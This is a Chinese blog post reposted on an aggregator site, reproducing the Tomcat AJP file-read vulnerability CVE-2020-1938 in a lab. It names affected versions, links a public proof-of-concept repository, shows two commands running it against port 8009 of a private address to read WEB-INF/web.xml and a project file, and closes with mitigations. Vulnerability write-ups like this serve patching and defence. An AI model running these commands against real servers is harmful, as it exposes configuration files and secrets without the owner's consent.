当前位置:首页 > 编程语言 > Apache-Tomcat CVE-2020-1938

Apache-Tomcat CVE-2020-1938

2021-05-30 09:02

阅读:476

标签:cat   webapp   image   通过   require   方案   hub   png   XML   

漏洞编号CVE-2020-1938 / CNVD-2020-10487

漏洞成因

Tomcat-AJP的文件包含

影响版本

Apache Tomcat 6
Apache Tomcat 7 Apache Tomcat 8 Apache Tomcat 9

复现

  • 下载tomcat漏洞版本:
    http://archive.apache.org/dist/tomcat/tomcat-8/v8.0.50/bin/
    开启了8080 和8009端口
    8009用于AJP协议的HTTP连接端口

  • python2版本运行poc:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
    通过命令行查看其他文件:WEB-INF/xxxx
    python2 ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.69.113 -p 8009 -f WEB-INF/web.xml
    技术图片

  • web项目要部署在webapps/ROOT目录下
    python2 ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.69.113 -p 8009 -f okr/pom.xml
    技术图片

修复建议

临时修改方案:

  • 临时禁用AJP协议端口,在conf/server.xml配置文件中注释掉
  • 配置ajp配置中的secretRequired跟secret属性来限制认证
  • 安装安全版本

Apache-Tomcat CVE-2020-1938

标签:cat   webapp   image   通过   require   方案   hub   png   XML   

原文地址:https://www.cnblogs.com/fightingcode/p/14678338.html

上一篇:centos7 cannot find a valid baseurl for repo

下一篇:PHP 实现大文件视频推流

文章来自:搜素材网编程语言模块,转载请注明文章出处。
文章标题:Apache-Tomcat CVE-2020-1938
文章链接:http://soscw.com/index.php/essay/89491.html

评论

亲,登录后才可以留言!

热门文章

推荐文章

最新文章

置顶文章

关于我们 | 版权声明 | 常见问题 | 素材投稿 | 联系我们 | 网站地图 |
搜素材网素材除本站原创外均由用户分享,若发现权利被侵害,请联系及时联系我们,我们会在第一时间进行处理。
特别说明:本站所有资源除本站原创外仅供学习与参考,请勿用于商业用途,如有侵犯您的版权请联系客服服务QQ:点击这里给我发消息
Copyright © 2024 soscw.com 搜素材网素材网版权所有 蜀ICP备18015633号-1